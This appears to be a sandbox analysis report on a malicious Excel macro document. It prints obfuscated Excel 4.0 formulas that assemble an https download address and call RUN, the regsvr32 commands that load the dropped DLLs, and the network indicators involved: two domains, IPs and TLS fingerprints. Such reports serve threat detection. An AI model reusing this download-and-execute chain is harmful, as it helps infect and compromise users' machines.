'Doc3'!AO20&'Doc2'!AX3&""C""&'Doc2'!AX10&'Doc2'!AX11&'Doc2'!AX12&'Doc2'!AX8&'Doc2'!AX9&'Doc2'!AX8&before.6.17.50.sheet!AY41&'Doc2'!AX7,'Doc3'!AN18)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA('Doc2'!AY14&'Doc2'!AX16&'Doc3'!AO19&'Doc2'!AY18&'Doc3'!AP13&'Doc2'!AY16&'Doc2'!AY17&'Doc2'!AY16&'Doc3'!AP14&'Doc2'!AY16&'Doc2'!AY17&'Doc2'!AY16&'Doc3'!AP15&'Doc2'!AY16&'Doc2'!AY20&'Doc2'!AY17&'Doc2'!AY16&""https://""&'Doc3'!AP16&'Doc2'!AY16&'Doc2'!AY17&'Doc2'!AY16&before.6.17.50.sheet!AY40&'Doc2'!AY16&'Doc2'!AY20&'Doc2'!AY20&'Doc2'!AY19,'Doc3'!AN13)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&RUN('Doc3'!AN10)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\palpy1.dll""",,,,,,,,,,,,,,,,"=""..\palpy2.dll""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
"=RIGHT(""LdecvsbgvrsxLxrgxgL"",1)",,,,,,,,,,,,,,,,"=LEFT(""LdecvsbgvrsxLxrgxg"",1)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jun 30, 2021 00:08:32.935113907 CEST  49739        443        192.168.2.4     103.28.39.29
Jun 30, 2021 00:08:33.164993048 CEST  443          49739      103.28.39.29    192.168.2.4
Jun 30, 2021 00:08:33.165199041 CEST  49739        443        192.168.2.4     103.28.39.29
Jun 30, 2021 00:08:33.167490005 CEST  49739        443        192.168.2.4     103.28.39.29
Jun 30, 2021 00:08:33.396576881 CEST  443          49739      103.28.39.29    192.168.2.4
Jun 30, 2021 00:08:33.397178888 CEST  443          49739      103.28.39.29    192.168.2.4
Jun 30, 2021 00:08:33.397212982 CEST  443          49739      103.28.39.29    192.168.2.4
Jun 30, 2021 00:08:33.397241116 CEST  443          49739      103.28.39.29    192.168.2.4
Jun 30, 2021 00:08:33.397260904 CEST  443          49739      103.28.39.29    192.168.2.4
Jun 30, 2021 00:08:33.397259951 CEST  49739        443        192.168.2.4     103.28.39.29
Jun 30, 2021 00:08:33.397304058 CEST  49739        443        192.168.2.4     103.28.39.29
Jun 30, 2021 00:08:33.397315979 CEST  49739        443        192.168.2.4     103.28.39.29
Jun 30, 2021 00:08:33.397321939 CEST  49739        443        192.168.2.4     103.28.39.29
Jun 30, 2021 00:08:33.399928093 CEST  443          49739      103.28.39.29    192.168.2.4
Jun 30, 2021 00:08:33.400088072 CEST  49739        443        192.168.2.4     103.28.39.29
Jun 30, 2021 00:08:33.443725109 CEST  49739        443        192.168.2.4     103.28.39.29
Jun 30, 2021 00:08:33.674485922 CEST  443          49739      103.28.39.29    192.168.2.4
Jun 30, 2021 00:08:33.674612999 CEST  49739        443        192.168.2.4     103.28.39.29
Jun 30, 2021 00:08:33.675638914 CEST  49739        443        192.168.2.4     103.28.39.29
Jun 30, 2021 00:08:33.907320023 CEST  443          49739      103.28.39.29    192.168.2.4
Jun 30, 2021 00:08:33.907463074 CEST  49739        443        192.168.2.4     103.28.39.29
Jun 30, 2021 00:08:33.907469988 CEST  443          49739      103.28.39.29    192.168.2.4
Jun 30, 2021 00:08:33.907556057 CEST  49739        443        192.168.2.4     103.28.39.29
Jun 30, 2021 00:08:33.995299101 CEST  49739        443        192.168.2.4     103.28.39.29
Jun 30, 2021 00:08:34.158024073 CEST  49741        443        192.168.2.4     104.244.121.13
Jun 30, 2021 00:08:34.226876974 CEST  443          49739      103.28.39.29    192.168.2.4
Jun 30, 2021 00:08:34.359838963 CEST  443          49741      104.244.121.13  192.168.2.4
Jun 30, 2021 00:08:34.360023975 CEST  49741        443        192.168.2.4     104.244.121.13
Jun 30, 2021 00:08:34.360469103 CEST  49741        443        192.168.2.4     104.244.121.13
Jun 30, 2021 00:08:34.561994076 CEST  443          49741      104.244.121.13  192.168.2.4
Jun 30, 2021 00:08:34.562361002 CEST  443          49741      104.244.121.13  192.168.2.4
Jun 30, 2021 00:08:34.562401056 CEST  443          49741      104.244.121.13  192.168.2.4
Jun 30, 2021 00:08:34.562439919 CEST  443          49741      104.244.121.13  192.168.2.4
Jun 30, 2021 00:08:34.562465906 CEST  443          49741      104.244.121.13  192.168.2.4
Jun 30, 2021 00:08:34.562503099 CEST  49741        443        192.168.2.4     104.244.121.13
Jun 30, 2021 00:08:34.562563896 CEST  49741        443        192.168.2.4     104.244.121.13
Jun 30, 2021 00:08:34.562578917 CEST  49741        443        192.168.2.4     104.244.121.13
Jun 30, 2021 00:08:34.562586069 CEST  49741        443        192.168.2.4     104.244.121.13
Jun 30, 2021 00:08:34.565370083 CEST  443          49741      104.244.121.13  192.168.2.4
Jun 30, 2021 00:08:34.565521002 CEST  49741        443        192.168.2.4     104.244.121.13
Jun 30, 2021 00:08:34.580204964 CEST  49741        443        192.168.2.4     104.244.121.13
Jun 30, 2021 00:08:34.781984091 CEST  443          49741      104.244.121.13  192.168.2.4
Jun 30, 2021 00:08:34.782138109 CEST  49741        443        192.168.2.4     104.244.121.13
Jun 30, 2021 00:08:35.131728888 CEST  49741        443        192.168.2.4     104.244.121.13
Jun 30, 2021 00:08:35.348674059 CEST  443          49741      104.244.121.13  192.168.2.4
Jun 30, 2021 00:08:35.348721981 CEST  443          49741      104.244.121.13  192.168.2.4
Jun 30, 2021 00:08:35.348805904 CEST  49741        443        192.168.2.4     104.244.121.13
Jun 30, 2021 00:08:35.348855972 CEST  49741        443        192.168.2.4     104.244.121.13
Jun 30, 2021 00:08:35.348942995 CEST  49741        443        192.168.2.4     104.244.121.13
Jun 30, 2021 00:08:35.550203085 CEST  443          49741      104.244.121.13  192.168.2.4

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jun 30, 2021 00:08:14.069195032 CEST  58028        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:14.126266956 CEST  53           58028      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:15.603213072 CEST  53097        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:15.652334929 CEST  53           53097      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:16.699806929 CEST  49257        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:16.751743078 CEST  53           49257      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:17.589102983 CEST  62389        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:17.637955904 CEST  53           62389      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:18.373897076 CEST  49910        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:18.425875902 CEST  53           49910      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:21.156306982 CEST  55854        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:21.207030058 CEST  53           55854      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:24.122312069 CEST  64549        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:24.181847095 CEST  53           64549      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:25.144474030 CEST  63153        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:25.203140974 CEST  53           63153      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:25.559120893 CEST  52991        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:25.578457117 CEST  53700        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:25.633059025 CEST  53           52991      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:25.642832994 CEST  53           53700      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:26.561460972 CEST  52991        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:26.666496992 CEST  53           52991      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:27.150618076 CEST  51726        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:27.207700968 CEST  53           51726      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:27.573991060 CEST  52991        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:27.634004116 CEST  53           52991      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:27.994618893 CEST  56794        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:28.048089027 CEST  53           56794      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:28.957083941 CEST  56534        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:29.012979984 CEST  53           56534      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:29.592685938 CEST  52991        53         192.168.2.4  8.8.8.8
Jun 30, 2021 00:08:29.654587030 CEST  53           52991      8.8.8.8      192.168.2.4
Jun 30, 2021 00:08:30.804543018 CEST  56627        53         192.168.2.4  8.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:30.862236977 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:32.216578007 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:32.277559996 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:32.504199982 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:32.930166960 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:33.058595896 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:33.116991997 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:33.574688911 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:33.634762049 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:34.005776882 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:34.156178951 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:34.163774967 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:34.222609043 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:35.320266962 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:35.371395111 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:37.111701965 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:37.162477016 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:37.921618938 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:37.974533081 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:42.183860064 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:42.245068073 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:58.589673996 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:58.821022987 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:59.405081034 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:59.463294983 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:59.585522890 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:59.642749071 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:00.106282949 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:00.244215965 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:00.794054031 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:00.853260994 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:01.461981058 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:01.522326946 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:02.154788017 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:02.216150045 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:02.726349115 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:02.785042048 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:03.697858095 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:03.757582903 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:04.794964075 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:04.849899054 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:05.431109905 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:05.493837118 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:08.118124962 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:08.170874119 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:17.812447071 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:17.817260027 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:17.876132965 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:17.878622055 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:20.819437981 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:20.884032011 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:51.871857882 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:51.930027008 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:53.658200026 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:53.731904030 CEST53642068.8.8.8192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 30, 2021 00:08:32.504199982 CEST | 192.168.2.4 | 8.8.8.8 | 0x74e2 | Standard query (0) | khangland.pro | A (IP address) | IN (0x0001)
Jun 30, 2021 00:08:34.005776882 CEST | 192.168.2.4 | 8.8.8.8 | 0xc7a2 | Standard query (0) | jaipurbynite.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 30, 2021 00:08:32.930166960 CEST | 8.8.8.8 | 192.168.2.4 | 0x74e2 | No error (0) | khangland.pro | (none) | 103.28.39.29 | A (IP address) | IN (0x0001)
Jun 30, 2021 00:08:34.156178951 CEST | 8.8.8.8 | 192.168.2.4 | 0xc7a2 | No error (0) | jaipurbynite.com | (none) | 104.244.121.13 | A (IP address) | IN (0x0001)

HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jun 30, 2021 00:08:33.399928093 CEST | 103.28.39.29 | 443 | 192.168.2.4 | 49739 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
  Certificate chain (Subject | Issuer | Not Before | Not After):
    CN=khangland.pro | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | Fri Jun 11 02:00:00 CEST 2021 | Fri Sep 10 01:59:59 CEST 2021
    CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Mon May 18 02:00:00 CEST 2015 | Sun May 18 01:59:59 CEST 2025
    CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029
Jun 30, 2021 00:08:34.565370083 CEST | 104.244.121.13 | 443 | 192.168.2.4 | 49741 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
  Certificate chain (Subject | Issuer | Not Before | Not After):
    CN=jaipurbynite.com | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | Wed Mar 31 02:00:00 CEST 2021 | Wed Jun 30 01:59:59 CEST 2021
    CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Mon May 18 02:00:00 CEST 2015 | Sun May 18 01:59:59 CEST 2025
    CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029

                                                                                                                                                        Code Manipulations

                                                                                                                                                        Statistics

                                                                                                                                                        Behavior

                                                                                                                                                        System Behavior

General

Start time: 00:08:23
Start date: 30/06/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0xba0000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 00:08:25
Start date: 30/06/2021
Path: C:\Windows\splwow64.exe
Wow64 process (32bit): false
Commandline: C:\Windows\splwow64.exe 12288
Imagebase: 0x7ff6ec6a0000
File size: 130560 bytes
MD5 hash: 8D59B31FF375059E3C32B17BF31A76D5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 00:08:34
Start date: 30/06/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: regsvr32 ..\palpy1.dll
Imagebase: 0xd60000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 00:08:35
Start date: 30/06/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: regsvr32 ..\palpy2.dll
Imagebase: 0xd60000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                        Disassembly

                                                                                                                                                        Code Analysis